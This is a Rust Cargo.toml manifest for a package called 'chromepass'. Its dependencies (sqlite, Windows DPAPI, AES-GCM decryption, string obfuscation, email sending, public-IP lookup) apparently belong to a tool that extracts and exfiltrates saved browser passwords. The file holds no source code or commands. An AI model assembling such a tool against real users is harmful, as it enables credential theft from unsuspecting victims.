[package]
name = "chromepass"
version = "4.1.5"
authors = ["darkArp <mario@whitehathacking.tech>"]
edition = "2018"
build = "build.rs"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
sqlite = "0.26.0"
winapi = { version = "0.3.0", features = [
    "dpapi",
    "errhandlingapi",
    "winuser",
] }
base64 = "0.13.0"
aes-gcm = "0.9.3"
reqwest = { version = "0.11.4", features = ["blocking", "json"] }
serde = { version = "1.0.127", features = ["derive"] }
serde_json = "1.0.59"
user32-sys = "0.2.0"
kernel32-sys = "0.2.0"
ntapi = "0.3.6"
litcrypt = "0.2.1"
lettre = "0.9.6"
lettre_email = "0.9.4"
mime = "0.3.16"
tokio = { version = "1.10.0", features = ["macros"] }
public-ip = { version = "0.2.1", features = ["http-resolver", "hyper"] }
[build-dependencies]
winres = "0.1"

[profile.release]
panic = 'abort'
# lto = true
# codegen-units = 16
